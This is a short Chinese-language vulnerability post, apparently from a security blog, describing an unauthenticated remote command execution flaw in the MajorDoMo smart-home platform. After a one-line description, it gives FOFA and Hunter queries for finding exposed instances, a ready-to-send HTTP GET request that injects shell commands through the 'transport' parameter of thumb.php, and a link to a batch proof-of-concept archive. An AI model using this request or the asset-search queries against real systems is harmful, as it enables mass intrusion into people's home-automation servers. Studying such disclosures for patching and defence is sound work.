漏洞描述
MajorDoMo是一个开源的智能家居自动化平台,让用户可以通过一个中心控制系统管理各种智能设备和家居设施,该平台在MajorDoMo < 0662e5e版本存在未授权rce漏洞。
资产检索
FOFA:
title="MajordomoSL"
icon_hash="1903390397"
hunter:
web.title="MajordomoSL"
web.icon="08d30f79c76f124754ac6f7789ca3ab1"
漏洞位置
/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BD%5D%27%3B+id%3B+echo+%27%5BD%5D%27%29%23%3B
漏洞复现
请求包:
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BD%5D%27%3B+id%3B+pwd%3B+echo+%27%5BD%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
批量poc
c25d15a0bc20240605154756.zip
zip文件
1.3K
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容